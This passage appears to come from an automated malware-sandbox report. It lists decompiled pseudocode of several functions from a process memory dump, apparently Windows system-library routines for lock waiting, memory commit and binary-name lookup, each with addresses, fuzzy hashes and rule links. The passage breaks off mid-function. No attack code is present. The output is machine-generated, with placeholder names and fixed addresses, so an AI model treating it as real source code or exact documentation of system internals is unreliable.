				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3495350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3497bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E033E97C0();
				}
				if( *0x34979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x34979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E033D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E033C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0343FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E033E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E033DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L033FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3496901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3496901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E033E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E033E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E033C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E033C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03427016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0343FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3495350;
							if(_t109 != 0x3495350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0343FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03435720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                          0x033a2d8a
                                          0x033a2d8a
                                          0x033a2d92
                                          0x033a2d96
                                          0x033a2d9e
                                          0x033a2da0
                                          0x033a2da3
                                          0x033a2da5
                                          0x033a2da8
                                          0x033a2dab
                                          0x033a2db2
                                          0x033ff9aa
                                          0x033ff9ab
                                          0x033ff9ae
                                          0x033ff9ae
                                          0x033a2db8
                                          0x033a2dc2
                                          0x033ff9b9
                                          0x033ff9be
                                          0x033ff9bf
                                          0x033ff9bf
                                          0x033a2dcf
                                          0x033ff9c9
                                          0x033a2dd5
                                          0x033a2dd5
                                          0x033a2dd5
                                          0x033a2dde
                                          0x033a2de1
                                          0x033a2e70
                                          0x033a2e72
                                          0x033a2e72
                                          0x033a2de7
                                          0x033a2deb
                                          0x033a2e7c
                                          0x033a2e83
                                          0x033a2e85
                                          0x033a2e8b
                                          0x033a2e8d
                                          0x033a2e92
                                          0x033a2e92
                                          0x033a2e85
                                          0x033a2df1
                                          0x033a2df7
                                          0x033a2df9
                                          0x033a2df9
                                          0x033a2dfc
                                          0x033a2dff
                                          0x033a2e02
                                          0x00000000
                                          0x033a2e05
                                          0x033a2e0c
                                          0x033ff9d9
                                          0x033a2e12
                                          0x033a2e12
                                          0x033a2e12
                                          0x033a2e1a
                                          0x033ff9e3
                                          0x033ff9e9
                                          0x033ff9f0
                                          0x033ff9f6
                                          0x033ff9f8
                                          0x033ff9f8
                                          0x033ff9f0
                                          0x033a2e23
                                          0x033ffa02
                                          0x033ffa03
                                          0x033ffa05
                                          0x033ffa06
                                          0x00000000
                                          0x033a2e29
                                          0x033a2e29
                                          0x033a2e2e
                                          0x033a2e34
                                          0x033a2e3e
                                          0x00000000
                                          0x00000000
                                          0x033a2e44
                                          0x033a2e47
                                          0x033a2e4d
                                          0x00000000
                                          0x00000000
                                          0x033a2e4f
                                          0x033a2e54
                                          0x00000000
                                          0x00000000
                                          0x033a2e5a
                                          0x033a2e5f
                                          0x033a2e9a
                                          0x033a2ea4
                                          0x033a2ea5
                                          0x033a2ea8
                                          0x033a2eaf
                                          0x033a2eb2
                                          0x033a2eb5
                                          0x033ffae9
                                          0x033ffaeb
                                          0x033ffaed
                                          0x033ffaef
                                          0x033ffaf7
                                          0x033ffaf8
                                          0x033ffafd
                                          0x033ffaff
                                          0x033ffb04
                                          0x033ffb04
                                          0x033ffaff
                                          0x033a2ec0
                                          0x033a2ec4
                                          0x033a2ec6
                                          0x033a2ec8
                                          0x033ffb14
                                          0x033ffb18
                                          0x033ffb1e
                                          0x033ffb21
                                          0x033ffb21
                                          0x033a2ece
                                          0x033a2ece
                                          0x033a2ece
                                          0x033a2ed7
                                          0x033a2e61
                                          0x033a2e63
                                          0x033ffa6b
                                          0x033ffa71
                                          0x033ffa76
                                          0x033ffa78
                                          0x033ffa8a
                                          0x033ffa7a
                                          0x033ffa83
                                          0x033ffa83
                                          0x033ffa8f
                                          0x033ffa91
                                          0x033ffa97
                                          0x033ffa9d
                                          0x033ffaa4
                                          0x033ffaaa
                                          0x033ffaaf
                                          0x033ffab1
                                          0x033ffac3
                                          0x033ffab3
                                          0x033ffabc
                                          0x033ffabc
                                          0x033ffac8
                                          0x033ffacb
                                          0x033ffadf
                                          0x033ffadf
                                          0x033ffacb
                                          0x033ffaa4
                                          0x033ffa91
                                          0x033a2e6f
                                          0x033a2e6f
                                          0x033a2e5f
                                          0x033ffa13
                                          0x033ffa15
                                          0x033ffa17
                                          0x033ffa1f
                                          0x033ffa21
                                          0x033ffa22
                                          0x033ffa25
                                          0x033ffa28
                                          0x033ffa2f
                                          0x033ffa2f
                                          0x033ffa2a
                                          0x033ffa2a
                                          0x033ffa2a
                                          0x033ffa31
                                          0x033ffa34
                                          0x033ffa36
                                          0x033ffa3c
                                          0x033ffa3e
                                          0x033ffa41
                                          0x033ffa43
                                          0x033ffa45
                                          0x033ffa45
                                          0x033ffa41
                                          0x033ffa3c
                                          0x033ffa4a
                                          0x033ffa4f
                                          0x033ffa51
                                          0x033ffa53
                                          0x033ffa56
                                          0x033ffa5b
                                          0x033ffa5e
                                          0x00000000
                                          0x033ffa5e
                                          0x033a2e23

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: feb1ae946181f3407c9a34cfeb942da67816cb3c26bebe1ef26058f4f54e1c70
                                          • Instruction ID: 095daa96b2589f14bad596ff589383fc80600047296890675ccd35d566ec9b67
                                          • Opcode Fuzzy Hash: feb1ae946181f3407c9a34cfeb942da67816cb3c26bebe1ef26058f4f54e1c70
                                          • Instruction Fuzzy Hash: 89611571A00B449FDB21DF6CCCC4B7FB7A8EB49714F180AAAD911AB6D1C7349D418B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03470EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E03470EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0346FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03471074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E033E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0346A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0346A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3498b04 >> 0x14) + (_v44 -  *0x3498b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E033C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0346138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E033C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0345FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3498724 & 0x00000008) != 0) {
						E034652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E034715B5(0x3498ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                          0x03470eb7
                                          0x03470eb9
                                          0x03470ec0
                                          0x03470ec2
                                          0x03470ecd
                                          0x0347105b
                                          0x0347105b
                                          0x03471061
                                          0x03471066
                                          0x03471066
                                          0x0347106b
                                          0x03471073
                                          0x03471073
                                          0x03470ed3
                                          0x03470ed6
                                          0x03470edc
                                          0x03470ee0
                                          0x03470ee7
                                          0x03470ef0
                                          0x03470ef5
                                          0x03470efa
                                          0x03470efc
                                          0x03470efd
                                          0x03470f03
                                          0x03470f04
                                          0x03470f06
                                          0x03470f07
                                          0x03470f09
                                          0x03470f0e
                                          0x03470f14
                                          0x03470f23
                                          0x03470f2d
                                          0x03470f34
                                          0x03470f34
                                          0x03470f14
                                          0x03470f52
                                          0x00000000
                                          0x00000000
                                          0x03470f58
                                          0x03470f73
                                          0x03470f74
                                          0x03470f79
                                          0x03470f7d
                                          0x03470f80
                                          0x03470f86
                                          0x03470fab
                                          0x03470fb5
                                          0x03470fc6
                                          0x03470fd1
                                          0x03470fe3
                                          0x03470fd3
                                          0x03470fdc
                                          0x03470fdc
                                          0x03470feb
                                          0x03471009
                                          0x03471009
                                          0x03471015
                                          0x03471027
                                          0x03471017
                                          0x03471020
                                          0x03471020
                                          0x0347102f
                                          0x0347103c
                                          0x0347103c
                                          0x03471048
                                          0x03471050
                                          0x03471050
                                          0x03471055
                                          0x00000000
                                          0x03471055
                                          0x03470f88
                                          0x03470f9e
                                          0x03470fa2
                                          0x03470fa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03470fa9
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 85b6d99ef58e8c66d8edea7dcc0a89fe06f30ee557c09d27674a026dc2a1a9b5
                                          • Instruction ID: 46fc1e7397ce02633866e01623b334a1db2c1817f56528df7f39aedf03b24858
                                          • Opcode Fuzzy Hash: 85b6d99ef58e8c66d8edea7dcc0a89fe06f30ee557c09d27674a026dc2a1a9b5
                                          • Instruction Fuzzy Hash: 6151AC702043819FD324DF29D984B5BB7E5EBC4704F08092EF9969F690D670E906CB6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E033DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E033C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E033E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E033E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E033E95D0();
							goto L11;
						} else {
							_t109 = L033C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E033EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E033E95D0();
										L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                          0x033df0d3
                                          0x033df0d9
                                          0x033df0e0
                                          0x033df0e7
                                          0x033df0f2
                                          0x033df0f4
                                          0x033df0f8
                                          0x033df100
                                          0x033df108
                                          0x033df10d
                                          0x033df115
                                          0x033df116
                                          0x033df11f
                                          0x033df123
                                          0x033df124
                                          0x033df12c
                                          0x033df130
                                          0x033df134
                                          0x033df13d
                                          0x033df144
                                          0x033df14b
                                          0x033df152
                                          0x0341bab0
                                          0x0341bab0
                                          0x033df158
                                          0x033df158
                                          0x033df15a
                                          0x033df160
                                          0x033df165
                                          0x033df166
                                          0x033df16f
                                          0x033df173
                                          0x0341baa7
                                          0x0341baa7
                                          0x0341baab
                                          0x00000000
                                          0x033df179
                                          0x033df18d
                                          0x033df191
                                          0x0341baa2
                                          0x00000000
                                          0x033df197
                                          0x033df19b
                                          0x033df1a2
                                          0x033df1a9
                                          0x033df1af
                                          0x033df1b2
                                          0x033df1b6
                                          0x033df1b9
                                          0x033df1c4
                                          0x033df1d8
                                          0x033df1df
                                          0x033df1e3
                                          0x033df1eb
                                          0x033df1ee
                                          0x033df1f4
                                          0x033df20f
                                          0x0341bab7
                                          0x0341babb
                                          0x0341bacc
                                          0x0341bad1
                                          0x033df215
                                          0x033df218
                                          0x033df226
                                          0x033df22b
                                          0x00000000
                                          0x033df22b
                                          0x033df1f6
                                          0x033df1f6
                                          0x033df1f9
                                          0x033df1fb
                                          0x033df1fb
                                          0x033df1f4
                                          0x033df191
                                          0x033df173
                                          0x033df152
                                          0x033df203

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: ce884f95ffc95e883387a2f59758e859e9a9e7663d6051d2c5717c6a6a0b8206
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 4F516E765047109FC321DF29C880A6BBBF8FF48750F00892EF9969B690E7B4E914CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03423540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E03423540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x349d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E033E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03423706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E033EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03423540;
						E033EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E033FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03430C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E033E97C0();
					}
					return E033EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03423971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03423884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E033EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E033E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03423787(_a4,  &_v352, _t80);
						}
					}
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E033E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                          0x03423552
                                          0x0342355a
                                          0x0342355d
                                          0x03423566
                                          0x03423567
                                          0x0342357e
                                          0x0342358f
                                          0x034235a1
                                          0x034235a5
                                          0x0342366b
                                          0x0342366b
                                          0x0342366d
                                          0x03423672
                                          0x03423679
                                          0x03423685
                                          0x0342368d
                                          0x0342369d
                                          0x034236a7
                                          0x034236b8
                                          0x034236c6
                                          0x034236c7
                                          0x034236dc
                                          0x034236e1
                                          0x034236e7
                                          0x034236e9
                                          0x034236e9
                                          0x03423703
                                          0x03423703
                                          0x034235b5
                                          0x034235c0
                                          0x034235c4
                                          0x00000000
                                          0x00000000
                                          0x034235ca
                                          0x034235d7
                                          0x034235e2
                                          0x034235e6
                                          0x034235e8
                                          0x034235f5
                                          0x034235fa
                                          0x03423603
                                          0x03423604
                                          0x03423609
                                          0x0342360a
                                          0x03423612
                                          0x03423613
                                          0x0342361e
                                          0x03423622
                                          0x03423628
                                          0x0342362f
                                          0x0342362f
                                          0x03423636
                                          0x03423638
                                          0x0342363b
                                          0x03423642
                                          0x03423642
                                          0x03423636
                                          0x03423657
                                          0x03423657
                                          0x0342365c
                                          0x03423662
                                          0x03423669
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 07c81c1335b17ac8c5711221ab0e2feb70b6624d6b50ba6fff9f217e9f6f20a6
                                          • Instruction ID: 545e582a685e8226ae87d98f78f1e82cd74b397b766a7e5819a2e83a61cdc2db
                                          • Opcode Fuzzy Hash: 07c81c1335b17ac8c5711221ab0e2feb70b6624d6b50ba6fff9f217e9f6f20a6
                                          • Instruction Fuzzy Hash: FB4143B5D0063D9EDF21DE50CC80F9EB77CAB44714F4045A6EA09AF250DB349E888F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034705AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E034705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E034707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E033E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0346A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0346A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03471293(_t79, _v40, E034707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E033C7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0346138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                          0x034705c5
                                          0x034705ca
                                          0x034705d3
                                          0x034706db
                                          0x034706db
                                          0x034706dd
                                          0x034706e3
                                          0x034706e3
                                          0x034705dd
                                          0x034705e7
                                          0x034705f6
                                          0x03470600
                                          0x03470607
                                          0x03470610
                                          0x03470615
                                          0x0347061a
                                          0x0347061c
                                          0x0347061e
                                          0x03470624
                                          0x03470625
                                          0x03470627
                                          0x03470628
                                          0x03470631
                                          0x03470640
                                          0x0347064d
                                          0x03470654
                                          0x03470654
                                          0x03470631
                                          0x0347066d
                                          0x03470674
                                          0x00000000
                                          0x00000000
                                          0x03470692
                                          0x0347069e
                                          0x034706b0
                                          0x034706a0
                                          0x034706a9
                                          0x034706a9
                                          0x034706b8
                                          0x034706d6
                                          0x034706d6
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: a369232a439e641e6a8d966cad62be8e7726ee09ee8fc0e95eaa929c7cdcf58a
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: 1B31E0726043456FE720DE25CC84FDBB7D9ABC4754F08422AFA58EF290D670E904CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03423884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E03423884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E033E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
